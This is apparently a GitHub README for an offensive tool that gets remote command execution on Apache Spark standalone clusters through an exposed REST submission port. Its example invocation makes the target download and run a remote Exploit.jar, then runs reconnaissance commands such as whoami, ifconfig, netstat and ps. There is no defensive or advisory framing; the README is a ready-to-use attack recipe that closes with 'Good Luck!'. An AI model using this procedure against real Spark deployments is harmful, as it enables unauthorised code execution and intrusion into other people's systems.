rce-over-spark
rce-over-spark copied to clipboard
Remote Command Execution Over Spark
Remote Command Execution Over Spark
Conditions
- Spark is running on Standalone Mode.
- REST URL of Master is accessible.
How to use
./submit.sh spark_rest_url spark_version jar_url commands
Example
./submit.sh \
1.1.1.1:6066 \
2.2.0 \
https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar \
"whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
Result
Good Luck!